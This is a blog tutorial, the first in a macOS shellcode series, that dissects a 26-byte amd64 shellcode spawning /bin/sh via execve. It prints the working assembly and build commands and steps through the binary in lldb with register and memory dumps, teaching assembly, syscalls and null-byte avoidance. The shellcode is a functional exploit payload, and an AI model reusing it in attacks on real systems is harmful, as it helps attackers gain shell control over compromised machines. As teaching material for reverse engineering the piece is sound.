Come taste some shellcode...

Come taste some shellcode...

MacOS Shellcode Primer #1

Abstract

In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.

This is a wonderful way to learn some assembly on MacOS, and introduce some secure software development practices.

Plus, it is fun!

Spawning a shell

This is the shellcode. Where it all begins. This will help us to introduce syscalls and the syscall we'll use the most, execve.

Let's start with some definitions. We'll borrow Wikipedia's:

Syscall

a system call (commonly abbreviated to syscall) is the programmatic way in which a computer program requests a service from the kernel of the operating system on which it is executed. This may include hardware-related services (for example, accessing a hard disk drive or accessing the device's camera), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.

Syscalls are widely used throughout programs - the concept is not strange at all.

Shellcode

a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.

So the "shellcode" is actually the exploit, the hack, the payload, the call-it-whatever that subverts the program.

As we are talking about Apple MacOS, we'll largely refer to XNU's source code - especially the syscalls.master file.

Let's see the original code.

; 26 bytes execute /bin/sh
;
bits    64
global _main
_main:

    xor     esi, esi         ; esi = 0
    mul     esi              ; eax = 0, edx = 0
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

We first observe that there is some usage inconsistency, here. e* registers are 32 bits, al is 16 bits, and r* registers are 64 bits. However, this code compiles and runs:

gbiondo@tripleX Odzhan % nasm -f macho64 shellspawn.asm                                                                       
gbiondo@tripleX Odzhan % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem -o shellspawn shellspawn.o
gbiondo@tripleX Odzhan % ./shellspawn                                                                                         

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$ ps -ef |grep -i bash
    0   695   621   0 Sun12PM ttys000    0:00.03 login -pfl gbiondo /bin/bash -c exec -la zsh /bin/zsh
  503 46117   703   0  2:30PM ttys001    0:00.01 (bash)
  503 46123 46117   0  2:30PM ttys001    0:00.00 grep -i bash
    0 23384   621   0  4:13PM ttys002    0:00.02 login -pfl gbiondo /bin/bash -c exec -la zsh /bin/zsh
bash-3.2$ exit
gbiondo@tripleX Odzhan %

In the result of the process status command, we see that the command that has been run is /bin/bash -c exec -la zsh /bin/zsh. Shortly, the code before spawns a shell.

To understand what is going on in the program, one should know how parameters are passed to invoked routines and what parameters are required to syscall.

Param. no. Register Register name
1 RDI Destination index register.
2 RSI Source index register.
3 RDX Data Register.

In detail:

  • Destination index register is used for string, memory array copying and setting, and for far pointer addressing with ES.
  • Source index register is used for string and memory array copying.
  • Data register is used for I/O port access, arithmetic, some interrupt calls. The data register is used in I/O operations as well as preferred in division and multiplication.

We invoke syscalls by loading in the register RAX (the accumulation register, which is used for I/O port access, arithmetic, interrupt calls, etc.) the number of the syscall added to 0x2000000.

Having said this, we need to understand how to find syscalls numbers. Here is where the syscalls.master comes into play. In fact, there is where all the syscalls are defined:

0    AUE_NULL    ALL    { int nosys(void); }   { indirect syscall }
1    AUE_EXIT    ALL    { void exit(int rval) NO_SYSCALL_STUB; }
2    AUE_FORK    ALL    { int fork(void) NO_SYSCALL_STUB; }
3    AUE_NULL    ALL    { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); }
4    AUE_NULL    ALL    { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }
[... SNIP ...]
57    AUE_SYMLINK    ALL    { int symlink(char *path, char *link); }
58    AUE_READLINK    ALL    { int readlink(char *path, char *buf, int count); }
59    AUE_EXECVE    ALL    { int execve(char *fname, char **argp, char **envp); }
60    AUE_UMASK    ALL    { int umask(int newmask); }
61    AUE_CHROOT    ALL    { int chroot(user_addr_t path); }
[... SNIP ...]

So the code moves into RAX the value 59, which is linked to the execve syscall. This API requires:

  • fname, which is a pointer to a char array (in plain English: a string)
  • argp, which is a pointer to a pointer to a char array (in plain English: an array of strings)
  • envp, which is a pointer to a pointer to a char array (in plain English: an array of strings)

A quick look at the man page (man 2 execve) gives a clearer explanation. For starters, the signature of this API is:

int execve(const char *path, char *const argv[], char *const envp[]);

and the description states:

execve() transforms the calling process into a new process. The new process is constructed from an ordinary file, whose name is pointed to by path, called the new process file. This file is either an executable object file, or a file of data for an interpreter. An executable object file consists of an identifying header, followed by pages of data representing the initial program (text) and initialized data pages.

[...]

If any optional args are specified, they become the first (second, ...) argument to the interpreter

[...]

The zeroth argument, normally the name of the execve()'d file, is left unchanged.

[...]

The argument argv is a pointer to a null-terminated array of character pointers to null-terminated character strings. These strings construct the argument list to be made available to the new process. At least one argument must be present in the array; by custom, the first element should be the name of the executed program (for example, the last component of path).

[...]

The argument envp is also a pointer to a null-terminated array of character pointers to null-terminated strings. A pointer to this array is normally stored in the global variable environ. These strings pass information to the new process that is not directly an argument to the command (see environ(7)).

[...]

Nuff said. Let's go through the code. The best way to do this is to debug it. We have seen already how this can be done with lldb in a previous article, but first it is meaningful to see the sections of this binary:

objdump --arch=x86_64 -m --section-headers shellspawn

Sections:
Idx Name          Size     VMA              Type
  0 __text        0000001a 0000000100003f9e TEXT
  1 __unwind_info 00000048 0000000100003fb8 DATA

Time to disassemble. As I usually do, I start with a breakpoint in the main routine and disassemble it. The result won't be much different from what we wrote:

(lldb) breakpoint set -name main
Breakpoint 1: where = shellspawn`main, address = 0x0000000100003f9e
(lldb) breakpoint list
Current breakpoints:
1: name = 'main', locations = 1
  1.1: where = shellspawn`main, address = shellspawn[0x0000000100003f9e], unresolved, hit count = 0 

(lldb) disassemble -n main
shellspawn`main:
shellspawn[0x100003f9e] <+0>:  xor    esi, esi
shellspawn[0x100003fa0] <+2>:  mul    esi
shellspawn[0x100003fa2] <+4>:  bts    eax, 0x19
shellspawn[0x100003fa6] <+8>:  mov    al, 0x3b
shellspawn[0x100003fa8] <+10>: movabs rbx, 0x68732f2f6e69622f
shellspawn[0x100003fb2] <+20>: push   rdx
shellspawn[0x100003fb3] <+21>: push   rbx
shellspawn[0x100003fb4] <+22>: push   rsp
shellspawn[0x100003fb5] <+23>: pop    rdi
shellspawn[0x100003fb6] <+24>: syscall

The first operation is actually an xor that zeroes the contents of the ESI register (every value XORred with itself returns zero). Then there is the mul instruction. It is the mnemonic for multiply and it has quite a peculiar syntax, because some of its operands are implicit. This instruction performs an unsigned multiplication of the first operand (destination operand) and the second operand (source operand) and stores the result in the destination operand. The destination operand is implied, and it is EAX (or RAX). So, writing mul src means multiplying rax and src as unsigned integers, and putting the result in rax and the high 64 bits of the product into rdx. In this case, the result of the instruction 0x100003fa0 is zeroing both RAX and RDX. After the instruction is executed, we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa2 shellspawn`main + 4
shellspawn`main:
->  0x100003fa2 <+4>:  bts    eax, 0x19
    0x100003fa6 <+8>:  mov    al, 0x3b
    0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
Target 0: (shellspawn) stopped.
(lldb) register read RAX RDX RSI
     rax = 0x0000000000000000
     rdx = 0x0000000000000000
     rsi = 0x0000000000000000

The next instruction, bts is bit test and set. It selects the bit in a bit string (specified with the first operand, called the bit base) at the bit-position designated by the bit offset operand (second operand), stores the value of the bit in the CF flag, and sets the selected bit in the bit string to 1.

EAX is a 32 bits register zeroed; and 0x19=25; this means that the result of the operation will be a string of all 0, apart for the 25th bit, set to 1: 0000 0010 0000 0000 0000 0000 0000 0000 or 0x02000000, and in fact we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa6 shellspawn`main + 8
shellspawn`main:
->  0x100003fa6 <+8>:  mov    al, 0x3b
    0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
Target 0: (shellspawn) stopped.
(lldb) register read RAX
     rax = 0x0000000002000000

The next instruction pushes 0x3b into the lowest part of the RAX/EAX register; in decimal, this is 59, the number of our syscall. In practical terms, after the execution of this instruction, we expect that the register RAX will contain 0x000000000200003b; and coherently we have:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fa8 shellspawn`main + 10
shellspawn`main:
->  0x100003fa8 <+10>: movabs rbx, 0x68732f2f6e69622f
    0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
    0x100003fb4 <+22>: push   rsp
Target 0: (shellspawn) stopped.
(lldb) register read EAX
     eax = 0x0200003b

So far, the instructions in the disassembled did not differ from the original ones, now we have quite a discrepancy, but here? How can mov rbx, '/bin//sh' translate in movabs rbx, 0x68732f2f6e69622f? Well, 68732f2f6e69622f is 16 chars, just exactly as the string '/bin//sh'. If we translate bitwise the string in ASCII we have:

68 73 2f 2f 6e 69 62 2f
h s / / n i b /

which is /bin//sh/ written backwards. This has to do with the endianness of macOS, which is little-endian. Shortly, this pushes the absolute value of the string into rbx:

(lldb) s
Process 61834 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb2 shellspawn`main + 20
shellspawn`main:
->  0x100003fb2 <+20>: push   rdx
    0x100003fb3 <+21>: push   rbx
    0x100003fb4 <+22>: push   rsp
    0x100003fb5 <+23>: pop    rdi
Target 0: (shellspawn) stopped.
(lldb) register read rbx
     rbx = 0x68732f2f6e69622f

So far, the RSI and RDX registers have been instantiated. Furthermore, RAX has been initialised with the syscall code. Now the only need to instantiate the value of RDI. This next instruction would push the current value of rdx (0x0) in the stack.

For starters, before executing the instruction we read the value of the stack pointer register:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff888

and we do the same after the instruction is run:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff880

This also highlights how the stack grows to lower memory addresses.

If we were to examine the memory area pointed by RSP before the instruction is executed, we'd see:

(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 60 00 0c 00 01 00 00 00 90 f9 ef bf f7 7f 00 00  `...............
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

After the instruction, we'd have:

(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 60 00 0c 00 01 00 00 00 00 00 00 00 00 00 00 00  `...............
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

Exactly in the same manner, the contents of rbx is pushed in the stack:

(lldb) register read rbx
     rbx = 0x68732f2f6e69622f
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb4 shellspawn`main + 22
shellspawn`main:
->  0x100003fb4 <+22>: push   rsp
    0x100003fb5 <+23>: pop    rdi
    0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
Target 0: (shellspawn) stopped.
(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 25 00 00 00 00 00 00 00  .(......%.......
0x7ff7bfeff878: 2f 62 69 6e 2f 2f 73 68 00 00 00 00 00 00 00 00  /bin//sh........
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

and so is rsp:

(lldb) register read rsp
     rsp = 0x00007ff7bfeff878
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb5 shellspawn`main + 23
shellspawn`main:
->  0x100003fb5 <+23>: pop    rdi
    0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
    0x100003fba:       add    byte ptr [rax], al
Target 0: (shellspawn) stopped.
(lldb) memory read 0x00007ff7bfeff888-64 0x00007ff7bfeff888+64
0x7ff7bfeff848: a0 83 08 00 01 00 00 00 9e 3f 00 00 01 00 00 00  .........?......
0x7ff7bfeff858: 10 40 07 00 01 00 00 00 80 f8 ef bf f7 7f 00 00  .@..............
0x7ff7bfeff868: 83 28 01 00 01 00 00 00 78 f8 ef bf f7 7f 00 00  .(......x.......
0x7ff7bfeff878: 2f 62 69 6e 2f 2f 73 68 00 00 00 00 00 00 00 00  /bin//sh........
0x7ff7bfeff888: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff898: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x7ff7bfeff8a8: 00 00 00 00 00 00 00 00 a0 83 08 00 01 00 00 00  ................
0x7ff7bfeff8b8: 00 00 00 42 00 00 00 00 83 d5 00 00 01 00 00 00  ...B............

Finally the value of rdi is instantiated with the top of the stack (which contains the value of rsp, 0x00007ff7bfeff878):

(lldb) register read rdi rsp
     rdi = 0x0000000000000001
     rsp = 0x00007ff7bfeff870
(lldb) s
Process 71654 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100003fb6 shellspawn`main + 24
shellspawn`main:
->  0x100003fb6 <+24>: syscall 
    0x100003fb8:       add    dword ptr [rax], eax
    0x100003fba:       add    byte ptr [rax], al
    0x100003fbc:       sbb    al, 0x0
Target 0: (shellspawn) stopped.
(lldb) register read rdi rsp
     rdi = 0x00007ff7bfeff878
     rsp = 0x00007ff7bfeff878

Finally, the syscall is invoked and a new shell is spawned.

Strategy

A quick recap of how the shellcode works.

1 - find the syscall number and specification

First of all, syscalls. A quick way to find syscalls is:

gbiondo@tripleX sys % pwd
/Library/Developer/CommandLineTools/SDKs/MacOSX12.3.sdk/System/Library/Frameworks/Kernel.framework/Versions/A/Headers/sys
gbiondo@tripleX sys % cat syscall.h

As we have seen before, once we have the number of the syscall, the number shall be converted in hexadecimal, and added to 0x02000000. The resulting value shall be stored in the EAX/RAX register.

The next stage would be understanding the parameters accepted by the syscall itself. For instance, we see that syscall 4 is SYS_write, or, seen differently (syscalls.master file):

4    AUE_NULL    ALL    { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); }

We conjecture that this syscall has 3 parameters: a file descriptor, the address of the buffer, and the size of the string to print. Confirmation comes from man 2 <syscall name>. In this case, a man 2 write would return:

ssize_t write(int fildes, const void *buf, size_t nbyte);

and the subsequent description of the parameters.

For shellcode, the most important syscall to know is execve, so let's stick to it. Its description is above. In this example, we simply invoke /bin/sh, so there is no need to use other parameters. In the next article we'll take care of how to run commands with parameters.

Some of you may have seen that the author of the blog post where we found the code used the string /bin//sh with two slashes between the directory and the executable. We'll come back on this later, but the reason why this string is used is to avoid null bytes.

2 - Zeroing RSI

This is accomplished by XORring the values of the registers with itself. The reason the task hasn't been accomplished with:

mov rsi, 0

is to avoid null bytes. This topic comes quite frequently, and there's a good reason. For the very moment, we religiously accept the dogma "null bytes are the root of all evil" :).

3 - Zeroing RAX and RDX

This is nothing but good practice. Good housekeeping practices :)

4 - Setting up RAX

RAX shall contain the number of the syscall. Consider that the value 0x02000000 can be stored in 32 bits, so the author uses EAX instead. Creating that constant means setting the 25th bit of a zeroed register to 1. 59 can be stored in 16 bits, so the author uses AL to store the value - simply moving the number to the register.

Actually the actions taken in points 3- and 4- show an inherent, intrinsic elegance...

5 - The first parameter to execve

The first parameter to execve is stored in the register RDI. It must be a null-terminated string containing the path of the executable. This string is built in the stack, and then popped to RDI. This is accomplished by storing the string in a temporary register (rbx), storing a null-terminator in the stack, and finally storing the string in the stack - remember that the stack is LIFO! - finally, the resulting string is popped down to the register.

6 - The second parameter to execve

The second parameter to execve is stored in RSI. It contains the list of parameters passed to the function. In our case, the list is empty, and considering that the register has been initialised to 0 in point 1 -, no further change is required.

7 - The third and last parameter to execve

The last parameter to the syscall is stored in RDX. In point 3 - its value has been set to 0. This is coherent, in fact, the third parameter is supposed to contain a null-terminated array in which environment variables are passed. In this case, it's an empty list.

Conclusions

This post focused on analysing the "malware" - or better, the shellcode, assuming we know no assembly. Every step has been explained like we had no assembly talent whatsoever - which is good, because this is how we learn to reverse-engineer something.

We will see some more examples, and then obtain a more generic strategy to use when designing shellcode.

See you next time. Have fun!

Did you find this article valuable?

Support Gabriele Biondo by becoming a sponsor. Any amount is appreciated!